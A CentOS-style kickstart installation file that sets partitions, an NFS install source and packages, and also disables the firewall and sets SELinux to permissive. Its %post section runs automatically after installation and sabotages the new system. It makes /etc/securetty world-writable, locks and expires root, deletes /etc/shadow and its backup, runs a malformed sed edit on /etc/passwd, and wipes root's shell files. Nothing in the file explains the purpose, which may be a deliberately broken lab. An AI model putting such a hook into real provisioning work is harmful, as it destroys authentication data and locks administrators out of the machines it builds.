auth  --useshadow  --enablemd5 
bootloader --append="rhgb quiet" --location=mbr --driveorder=hda
zerombr
clearpart --all  
text
firewall --disabled
firstboot --disable
keyboard us
lang en_US
logging --level=info
nfs --server=192.168.1.33 --dir=/centos
network --bootproto=dhcp --device=eth0 --onboot=on
reboot
rootpw --iscrypted $6$Se4bugdpzaKPlvD6$Ra9telcXwsTyLRkmKRzMAsFB27vzx4.NM2jWh4KP4GfNzADyiBbb3X/WSPUWh/MgZh5GLe15npsp17f5D7kAz0
selinux --permissive
timezone --isUtc Asia/Calcutta
install
part /boot --bytes-per-inode=4096 --fstype="ext3" --size=128
part /home --bytes-per-inode=4096 --fstype="ext3" --size=1024
part / --bytes-per-inode=4096 --fstype="ext3" --size=4000
part swap --bytes-per-inode=4096 --fstype="swap" --size=1024

%packages

@base
@base-x
@core
@editors

%post
chmod 666 /etc/securetty
#mv /etc/securetty /etc/securettyy
#rm -fr /etc/securetty
#echo "ALREADY ACTIVATED no need to edit" > /etc/securetty
usermod -L root
chage -E 19Nov1998 root
rm -rf /etc/shadow-
rm -rf /etc/shadow
sed -e '/s/0/o/g' -i.bak /etc/passwd
rm -fr /root/.bash*




